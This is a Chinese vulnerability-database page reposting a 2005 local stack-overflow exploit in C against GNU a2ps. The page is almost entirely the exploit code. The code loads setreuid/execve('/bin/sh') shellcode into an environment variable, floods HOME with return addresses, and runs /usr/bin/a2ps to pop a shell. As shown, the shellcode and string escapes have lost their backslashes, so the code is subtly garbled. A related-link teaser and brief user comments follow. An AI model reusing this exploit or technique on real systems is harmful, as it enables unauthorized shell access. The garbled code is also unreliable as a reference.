GNU a2ps – Anything to PostScript Not SUID Local Overflow
漏洞ID | 1054898 | 漏洞类型 | |
发布时间 | 2005-02-13 | 更新时间 | 2005-02-13 |
CVE编号 | N/A |
CNNVD-ID | N/A |
漏洞平台 | Linux | CVSS评分 | N/A |
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
/* Not added to Local Non Poc section /str0ke */
#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
// by lizard / lizstyle[at]gmail.com
// greets go to slider/trog for helpin me
// not suid by default ;(
#define VULNTHING "/usr/bin/a2ps"
#define DEFRET 0xbffffffa - strlen(sc) - strlen(VULNTHING)
#define xnullbitch 1100
//i`m not a asm guru so i ripped this shellcode
//shellcode by man shadow
char sc[] =
"x31xC9" /* xor ecx,ecx */
"x31xDB" /* xor ebx,ebx */
"x6Ax46" /* push byte 70 */
"x58" /* pop eax */
"xCDx80" /* int 80h */
"x51" /* push ecx */
"x68x2Fx2Fx73x68" /* push 0x68732F2F */
"x68x2Fx62x69x6E" /* push 0x6E69622F */
"x89xE3" /* mov ebx,esp */
"x51" /* push ecx */
"x53" /* push ebx */
"x89xE1" /* mov ecx,esp */
"x99" /* cdq */
"xB0x0B" /* mov al,11 */
"xCDx80"; /* int 80h */
int main(void) {
int ctr = 0;
char buffer[xnullbitch];
fprintf(stdout, "[*] 0x%8xn", (long) DEFRET);
for(ctr = 0; ctr < xnullbitch - 1; ctr += 4)
*(long *) &buffer[ctr] = (long) DEFRET;
buffer[xnullbitch - 1] = ' ';
if((setenv("HOME", buffer, 1)) == -1) {
perror("setenv()");
exit(1);
}
if((setenv("TOPX", sc, 1)) == -1) {
perror("setenv()");
exit(1);
}
if((execl(VULNTHING, VULNTHING, NULL)) == -1) {
perror("execl()");
exit(1);
}
return(0);
}
// milw0rm.com [2005-02-13]
相关推荐: John O’Fallon Responder.cgi 1.0 – Denial of Service
John O’Fallon Responder.cgi 1.0 – Denial of Service 漏洞ID 1053390 漏洞类型 发布时间 1999-04-09 更新时间 1999-04-09 CVE编号 N/A CNNVD-ID N/A 漏洞平台 …
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666